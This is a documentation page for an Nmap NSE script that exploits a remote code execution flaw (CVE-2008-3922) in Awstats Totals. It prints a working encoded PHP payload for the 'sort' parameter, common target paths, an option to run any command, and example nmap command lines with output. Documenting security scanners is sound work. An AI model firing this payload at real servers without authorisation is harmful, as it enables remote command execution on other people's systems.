File http-awstatstotals-exec

脚本使用类型: portrule
脚本所属分类: vuln, intrusive, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse

User Summary

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).

This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function: ?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}

Common paths for Awstats Total:

• /awstats/index.php
• /awstatstotals/index.php
• /awstats/awstatstotals.php

References:

• http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
• http://www.exploit-db.com/exploits/17324/

Script Arguments

http-awstatstotals-exec.uri

Awstats Totals URI including path. Default: /index.php

http-awstatstotals-exec.cmd

Command to execute. Default: whoami

http-awstatstotals-exec.outfile

Output file. If set it saves the output in this file.

Other useful args when running this script: http.useragent - User Agent to use in GET request

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

Example Usage

执行格式

nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux

Requires

• http
• io
• nmap
• shortport
• stdnse
• string

Author: Paulino Calderon

License: VER007 整理 http://www.ver007.com